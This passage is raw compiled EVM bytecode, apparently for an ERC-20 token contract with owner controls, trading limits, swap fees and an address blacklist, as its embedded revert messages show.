7905092915050565b62001fc48262001d55565b67ffffffffffffffff81111562001fe05762001fdf62001d5f565b5b62001fec825462001db9565b62001ff982828562001f22565b5f60209050601f8311600181146200202f575f84156200201a578287015190505b62002026858262001f9c565b86555062002095565b601f1984166200203f8662001ded565b5f5b82811015620020685784890151825560018201915060208501945060208101905062002041565b8683101562002088578489015162002084601f89168262001f7e565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f546f6b656e20697320747261646561626c6500000000000000000000000000005f82015250565b5f620020e36012836200209d565b9150620020f082620020ad565b602082019050919050565b5f6020820190508181035f8301526200211481620020d5565b9050919050565b5f6020828403121562002133576200213262001c73565b5b5f620021428482850162001cc2565b91505092915050565b620021568162001c96565b82525050565b5f604082019050620021715f8301856200214b565b6200218060208301846200214b565b9392505050565b5f8160601b9050919050565b5f6200219f8262002187565b9050919050565b5f620021b28262002193565b9050919050565b620021ce620021c88262001c96565b620021a6565b82525050565b5f620021e18284620021b9565b60148201915081905092915050565b5f8115159050919050565b6200220681620021f0565b82525050565b5f602082019050620022215f830184620021fb565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6200225d601f836200209d565b91506200226a8262002227565b602082019050919050565b5f6020820190508181035f8301526200228e816200224f565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620022ce8262001e6f565b9150620022db8362001e6f565b9250828201905080821115620022f657620022f562002295565b5b92915050565b620023078162001e6f565b82525050565b5f602082019050620023225f830184620022fc565b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6200235e6020836200209d565b91506200236b8262002328565b602082019050919050565b5f6020820190508181035f8301526200238f8162002350565b9050919050565b608051613ea8620023e75f395f8181610aa60152818161104d015281816110b301528181611154015281816113860152818161143b015281816124a00152818161257f01526125a60152613ea85ff3fe60806040526004361061021d575f3560e01c806389291a8f11610122578063c8c8ebe4116100aa578063dd8546521161006e578063dd854652146107ae578063e2f45605146107d8578063f2fde38b14610802578063f8b45b051461082a578063ffb54a991461085457610224565b8063c8c8ebe4146106de578063c9567bf914610708578063ca7030751461071e578063cf9522fd14610748578063dd62ed3e1461077257610224565b80639a7a23d6116100f15780639a7a23d6146105ee578063a457c2d714610616578063a9059cbb14610652578063afa4f3b21461068e578063c0246668146106b657610224565b806389291a8f146105485780638da5cb5b1461055e57806395d89b411461058857806397682884146105b257610224565b8063313ce567116101a55780636ddd1713116101745780636ddd17131461047c57806370a08231146104a6578063715018a6146104e25780637571336a146104f8578063881dce601461052057610224565b8063313ce567146103b057806339509351146103da5780634fbee19314610416578063583e05681461045257610224565b8063139864a8116101ec578063139864a8146102ce57806318160ddd146102e45780632315bf141461030e57806323b872dd1461034a578063311028af1461038657610224565b806306fdde0314610228578063095ea7b3146102525780630c6b67371461028e5780630f054c06146102b857610224565b3661022457005b5f80fd5b348015610233575f80fd5b5061023c61087e565b6040516102499190612c23565b60405180910390f35b34801561025d575f80fd5b5061027860048036038101906102739190612cd4565b61090e565b6040516102859190612d2c565b60405180910390f35b348015610299575f80fd5b506102a2610930565b6040516102af9190612d54565b60405180910390f35b3480156102c3575f80fd5b506102cc610936565b005b3480156102d9575f80fd5b506102e2610961565b005b3480156102ef575f80fd5b506102f8610985565b6040516103059190612d54565b60405180910390f35b348015610319575f80fd5b50610334600480360381019061032f9190612d6d565b61098e565b6040516103419190612d2c565b60405180910390f35b348015610355575f80fd5b50610370600480360381019061036b9190612d98565b6109e0565b60405161037d9190612d2c565b60405180910390f35b348015610391575f80fd5b5061039a610a0e565b6040516103a79190612d54565b60405180910390f35b3480156103bb575f80fd5b506103c4610a14565b6040516103d19190612e03565b60405180910390f35b3480156103e5575f80fd5b5061040060048036038101906103fb9190612cd4565b610a1c565b60405161040d9190612d2c565b60405180910390f35b348015610421575f80fd5b5061043c60048036038101906104379190612d6d565b610a52565b6040516104499190612d2c565b60405180910390f35b34801561045d575f80fd5b50610466610aa4565b6040516104739190612e77565b60405180910390f35b348015610487575f80fd5b50610490610ac8565b60405161049d9190612d2c565b60405180910390f35b3480156104b1575f80fd5b506104cc60048036038101906104c79190612d6d565b610adb565b6040516104d99190612d54565b60405180910390f35b3480156104ed575f80fd5b506104f6610b20565b005b348015610503575f80fd5b5061051e60048036038101906105199190612eba565b610b33565b005b34801561052b575f80fd5b5061054660048036038101906105419190612ef8565b610b93565b005b348015610553575f80fd5b5061055c610c76565b005b348015610569575f80fd5b50610572610d06565b60405161057f9190612f32565b60405180910390f35b348015610593575f80fd5b5061059c610d2e565b6040516105a99190612c23565b60405180910390f35b3480156105bd575f80fd5b506105d860048036038101906105d39190612d6d565b610dbe565b6040516105e59190612d2c565b60405180910390f35b3480156105f9575f80fd5b50610614600480360381019061060f9190612eba565b610ddb565b005b348015610621575f80fd5b5061063c60048036038101906106379190612cd4565b610e80565b6040516106499190612d2c565b60405180910390f35b34801561065d575f80fd5b5061067860048036038101906106739190612cd4565b610ef5565b6040516106859190612d2c565b60405180910390f35b348015610699575f80fd5b506106b460048036038101906106af9190612ef8565b610f17565b005b3480156106c1575f80fd5b506106dc60048036038101906106d79190612eba565b610f3c565b005b3480156106e9575f80fd5b506106f2610fea565b6040516106ff9190612d54565b60405180910390f35b348015610713575f80fd5b5061071c610ff0565b005b348015610729575f80fd5b50610732611524565b60405161073f9190612d54565b60405180910390f35b348015610753575f80fd5b5061075c61152a565b6040516107699190612d54565b60405180910390f35b34801561077d575f80fd5b5061079860048036038101906107939190612f4b565b611530565b6040516107a59190612d54565b60405180910390f35b3480156107b9575f80fd5b506107c26115b2565b6040516107cf9190612d54565b60405180910390f35b3480156107e3575f80fd5b506107ec6115b8565b6040516107f99190612d54565b60405180910390f35b34801561080d575f80fd5b5061082860048036038101906108239190612d6d565b6115be565b005b348015610835575f80fd5b5061083e611640565b60405161084b9190612d54565b60405180910390f35b34801561085f575f80fd5b50610868611646565b6040516108759190612d2c565b60405180910390f35b60606003805461088d90612fb6565b80601f01602080910402602001604051908101604052809291908181526020018280546108b990612fb6565b80156109045780601f106108db57610100808354040283529160200191610904565b820191905f5260205f20905b8154815290600101906020018083116108e757829003601f168201915b5050505050905090565b5f80610918611658565b905061092581858561165f565b600191505092915050565b600f5481565b61093e611822565b5f61094830610adb565b90505f81111561095e5761095d3033836118a0565b5b50565b610969611822565b5f610972610985565b905080600b8190555080600c8190555050565b5f600254905090565b5f60065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806109ea611658565b90506109f78582856122b5565b610a028585856118a0565b60019150509392505050565b600a5481565b5f6012905090565b5f80610a26611658565b9050610a47818585610a388589611530565b610a429190613013565b61165f565b600191505092915050565b5f60155f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b7f000000000000000000000000000000000000000000000000000000000000000081565b601060019054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b28611822565b610b315f612340565b565b610b3b611822565b8060165f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610bd3611658565b73ffffffffffffffffffffffffffffffffffffffff1614610bf2575f80fd5b5f610bfb610985565b90505f610c0730610adb565b90505f60648484610c189190613046565b610c2291906130b4565b905080821015610c67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5e9061312e565b60405180910390fd5b610c7081612403565b50505050565b610c7e611822565b5f4711610cc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb790613196565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610d03573d5f803e3d5ffd5b50565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610d3d90612fb6565b80601f0160208091040260200160405190810160405280929190818152602001828054610d6990612fb6565b8015610db45780601f10610d8b57610100808354040283529160200191610db4565b820191905f5260205f20905b815481529060010190602001808311610d9757829003601f168201915b5050505050905090565b6006602052805f5260405f205f915054906101000a900460ff1681565b610de3611822565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990613224565b60405180910390fd5b610e7c8282612657565b5050565b5f80610e8a611658565b90505f610e978286611530565b905083811015610edc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed3906132b2565b60405180910390fd5b610ee9828686840361165f565b60019250505092915050565b5f80610eff611658565b9050610f0c8185856118a0565b600191505092915050565b610f1f611822565b670de0b6b3a764000081610f339190613046565b600d8190555050565b610f44611822565b8060155f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051610fde9190612d2c565b60405180910390a25050565b600b5481565b610ff8611822565b60105f9054906101000a900460ff1615611047576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103e9061331a565b60405180910390fd5b611074307f0000000000000000000000000000000000000000000000000000000000000000600a5461165f565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f00000000000000000000000000000000000000000000000000000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401611110929190613338565b6020604051808303815f875af115801561112c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111509190613373565b505f7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156111bb573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111df91906133b2565b90505f8173ffffffffffffffffffffffffffffffffffffffff166370a0823160075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166040518263ffffffff1660e01b815260040161123c9190612f32565b602060405180830381865afa158015611257573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061127b91906133f1565b90505f611294603f600a546126f590919063ffffffff16565b90505f80831115611439576112b2834761275a90919063ffffffff16565b90505f6112da826112cc868661276f90919063ffffffff16565b61278490919063ffffffff16565b90506113083060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683612799565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b81526004015f604051808303815f87803b15801561136e575f80fd5b505af1158015611380573d5f803e3d5ffd5b505050507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7198330865f876113cd610d06565b426040518863ffffffff1660e01b81526004016113ef96959493929190613455565b60606040518083038185885af115801561140b573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061143091906134b4565b505050506114e9565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7194730855f80611482610d06565b426040518863ffffffff1660e01b81526004016114a496959493929190613504565b60606040518083038185885af11580156114c0573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906114e591906134b4565b5050505b6001601060016101000a81548160ff021916908315150217905550600160105f6101000a81548160ff02191690831515021790555050505050565b600e5481565b60125481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60115481565b600d5481565b6115c6611822565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611634576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161162b906135d3565b60405180910390fd5b61163d81612340565b50565b600c5481565b60105f9054906101000a900460ff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116c490613661565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361173b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611732906136ef565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516118159190612d54565b60405180910390a3505050565b61182a611658565b73ffffffffffffffffffffffffffffffffffffffff16611848610d06565b73ffffffffffffffffffffffffffffffffffffffff161461189e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161189590613757565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361190e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611905906137e5565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361197c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161197390613873565b60405180910390fd5b60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611a1a575060065f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b611a59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a5090613901565b60405180910390fd5b601354600e5410611a6d5760016011819055505b601454600f5410611a815760016012819055505b5f8103611a9857611a9383835f612799565b6122b0565b611aa0610d06565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611b0e5750611ade610d06565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611b4657505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611b80575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611b995750600960149054906101000a900460ff16155b15611f945760105f9054906101000a900460ff16611c8c5760155f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611c4c575060155f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611c8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c8290613969565b60405180910390fd5b5b60175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611d29575060165f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611de757600b54811115611d73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6a906139f7565b60405180910390fd5b600c54611d7f83610adb565b82611d8a9190613013565b1115611dcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc290613a5f565b60405180910390fd5b600e5f815480929190611ddd90613a7d565b9190505550611f93565b60175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611e84575060165f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611eea57600b54811115611ece576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ec590613b34565b60405180910390fd5b600f5f815480929190611ee090613a7d565b9190505550611f92565b60165f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611f9157600c54611f4483610adb565b82611f4f9190613013565b1115611f90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8790613a5f565b60405180910390fd5b5b5b5b5b5f611f9e30610adb565b90505f8082119050808015611fbf5750601060019054906101000a900460ff165b8015611fd85750600960149054906101000a900460ff16155b801561202b575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561207e575060155f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156120d1575060155f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15612115576001600960146101000a81548160ff0219169083151502179055506120fa83612a05565b5f600960146101000a81548160ff0219169083151502179055505b5f600960149054906101000a900460ff1615905060155f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806121c4575060155f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b156121cd575f90505b5f81156122a05760175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156122525761224b606461223d6012548861276f90919063ffffffff16565b61278490919063ffffffff16565b905061227d565b61227a606461226c6011548861276f90919063ffffffff16565b61278490919063ffffffff16565b90505b5f81111561229157612290873083612799565b5b808561229d9190613b52565b94505b6122ab878787612799565b505050505b505050565b5f6122c08484611530565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461233a578181101561232c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161232390613bcf565b60405180910390fd5b612339848484840361165f565b5b50505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600267ffffffffffffffff81111561241f5761241e613bed565b5b60405190808252806020026020018201604052801561244d5781602001602082028036833780820191505090505b50905030815f8151811061246457612463613c1a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612507573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061252b91906133b2565b8160018151811061253f5761253e613c1a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506125a4307f00000000000000000000000000000000000000000000000000000000000000008461165f565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8460095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518663ffffffff1660e01b8152600401612626959493929190613cfe565b5f604051808303815f87803b15801561263d575f80fd5b505af115801561264f573d5f803e3d5ffd5b505050505050565b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f606482111561273a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273190613dc6565b60405180910390fd5b606482846127489190613046565b61275291906130b4565b905092915050565b5f81836127679190613b52565b905092915050565b5f818361277c9190613046565b905092915050565b5f818361279191906130b4565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612807576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127fe906137e5565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612875576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161286c90613873565b60405180910390fd5b612880838383612b8f565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015612903576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128fa90613e54565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516129ec9190612d54565b60405180910390a36129ff848484612b94565b50505050565b5f612a0f30610adb565b90505f808203612a20575050612b8c565b5f601254601154612a319190613013565b03612aab575f82118015612a465750600d5482105b15612a5357819050612aa6565b5f612a7c6064612a6e6012548761276f90919063ffffffff16565b61278490919063ffffffff16565b90508084612a8a9190613b52565b9350600d54841115612aa057600d549150612aa4565b8391505b505b612b80565b5f82118015612ace5750612acb6002600d5461278490919063ffffffff16565b82105b15612ada575050612b8c565b5f82118015612afd5750612afa6002600d5461278490919063ffffffff16565b82115b8015612b0a5750600d5482105b15612b2c57612b256002600d5461278490919063ffffffff16565b9050612b7f565b5f612b556064612b476012548761276f90919063ffffffff16565b61278490919063ffffffff16565b90508084612b639190613b52565b9350600d54841115612b7957600d549150612b7d565b8391505b505b5b612b8981612403565b50505b50565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015612bd0578082015181840152602081019050612bb5565b5f8484015250505050565b5f601f19601f8301169050919050565b5f612bf582612b99565b612bff8185612ba3565b9350612c0f818560208601612bb3565b612c1881612bdb565b840191505092915050565b5f6020820190508181035f830152612c3b8184612beb565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612c7082612c47565b9050919050565b612c8081612c66565b8114612c8a575f80fd5b50565b5f81359050612c9b81612c77565b92915050565b5f819050919050565b612cb381612ca1565b8114612cbd575f80fd5b50565b5f81359050612cce81612caa565b92915050565b5f8060408385031215612cea57612ce9612c43565b5b5f612cf785828601612c8d565b9250506020612d0885828601612cc0565b9150509250929050565b5f8115159050919050565b612d2681612d12565b82525050565b5f602082019050612d3f5f830184612d1d565b92915050565b612d4e81612ca1565b82525050565b5f602082019050612d675f830184612d45565b92915050565b5f60208284031215612d8257612d81612c43565b5b5f612d8f84828501612c8d565b91505092915050565b5f805f60608486031215612daf57612dae612c43565b5b5f612dbc86828701612c8d565b9350506020612dcd86828701612c8d565b9250506040612dde86828701612cc0565b9150509250925092565b5f60ff82169050919050565b612dfd81612de8565b82525050565b5f602082019050612e165f830184612df4565b92915050565b5f819050919050565b5f612e3f612e3a612e3584612c47565b612e1c565b612c47565b9050919050565b5f612e5082612e25565b9050919050565b5f612e6182612e46565b9050919050565b612e7181612e57565b82525050565b5f602082019050612e8a5f830184612e68565b92915050565b612e9981612d12565b8114612ea3575f80fd5b50565b5f81359050612eb481612e90565b92915050565b5f8060408385031215612ed057612ecf612c43565b5b5f612edd85828601612c8d565b9250506020612eee85828601612ea6565b9150509250929050565b5f60208284031215612f0d57612f0c612c43565b5b5f612f1a84828501612cc0565b91505092915050565b612f2c81612c66565b82525050565b5f602082019050612f455f830184612f23565b92915050565b5f8060408385031215612f6157612f60612c43565b5b5f612f6e85828601612c8d565b9250506020612f7f85828601612c8d565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680612fcd57607f821691505b602082108103612fe057612fdf612f89565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61301d82612ca1565b915061302883612ca1565b92508282019050808211156130405761303f612fe6565b5b92915050565b5f61305082612ca1565b915061305b83612ca1565b925082820261306981612ca1565b915082820484148315176130805761307f612fe6565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6130be82612ca1565b91506130c983612ca1565b9250826130d9576130d8613087565b5b828204905092915050565b7f4e6f7420656e6f75676820746f6b656e730000000000000000000000000000005f82015250565b5f613118601183612ba3565b9150613123826130e4565b602082019050919050565b5f6020820190508181035f8301526131458161310c565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f613180601683612ba3565b915061318b8261314c565b602082019050919050565b5f6020820190508181035f8301526131ad81613174565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d205f8201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b5f61320e603983612ba3565b9150613219826131b4565b604082019050919050565b5f6020820190508181035f83015261323b81613202565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61329c602583612ba3565b91506132a782613242565b604082019050919050565b5f6020820190508181035f8301526132c981613290565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e0000000000000000005f82015250565b5f613304601783612ba3565b915061330f826132d0565b602082019050919050565b5f6020820190508181035f830152613331816132f8565b9050919050565b5f60408201905061334b5f830185612f23565b6133586020830184612d45565b9392505050565b5f8151905061336d81612e90565b92915050565b5f6020828403121561338857613387612c43565b5b5f6133958482850161335f565b91505092915050565b5f815190506133ac81612c77565b92915050565b5f602082840312156133c7576133c6612c43565b5b5f6133d48482850161339e565b91505092915050565b5f815190506133eb81612caa565b92915050565b5f6020828403121561340657613405612c43565b5b5f613413848285016133dd565b91505092915050565b5f819050919050565b5f61343f61343a6134358461341c565b612e1c565b612ca1565b9050919050565b61344f81613425565b82525050565b5f60c0820190506134685f830189612f23565b6134756020830188612d45565b6134826040830187613446565b61348f6060830186612d45565b61349c6080830185612f23565b6134a960a0830184612d45565b979650505050505050565b5f805f606084860312156134cb576134ca612c43565b5b5f6134d8868287016133dd565b93505060206134e9868287016133dd565b92505060406134fa868287016133dd565b9150509250925092565b5f60c0820190506135175f830189612f23565b6135246020830188612d45565b6135316040830187613446565b61353e6060830186613446565b61354b6080830185612f23565b61355860a0830184612d45565b979650505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6135bd602683612ba3565b91506135c882613563565b604082019050919050565b5f6020820190508181035f8301526135ea816135b1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61364b602483612ba3565b9150613656826135f1565b604082019050919050565b5f6020820190508181035f8301526136788161363f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6136d9602283612ba3565b91506136e48261367f565b604082019050919050565b5f6020820190508181035f830152613706816136cd565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613741602083612ba3565b915061374c8261370d565b602082019050919050565b5f6020820190508181035f83015261376e81613735565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6137cf602583612ba3565b91506137da82613775565b604082019050919050565b5f6020820190508181035f8301526137fc816137c3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61385d602383612ba3565b915061386882613803565b604082019050919050565b5f6020820190508181035f83015261388a81613851565b9050919050565b7f45524332303a207472616e736665722066726f6d2f746f2074686520626c61635f8201527f6b6c697374656420616464726573730000000000000000000000000000000000602082015250565b5f6138eb602f83612ba3565b91506138f682613891565b604082019050919050565b5f6020820190508181035f830152613918816138df565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f613953601683612ba3565b915061395e8261391f565b602082019050919050565b5f6020820190508181035f83015261398081613947565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f6139e1603583612ba3565b91506139ec82613987565b604082019050919050565b5f6020820190508181035f830152613a0e816139d5565b9050919050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f613a49601383612ba3565b9150613a5482613a15565b602082019050919050565b5f6020820190508181035f830152613a7681613a3d565b9050919050565b5f613a8782612ca1565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613ab957613ab8612fe6565b5b600182019050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613b1e603683612ba3565b9150613b2982613ac4565b604082019050919050565b5f60208201905081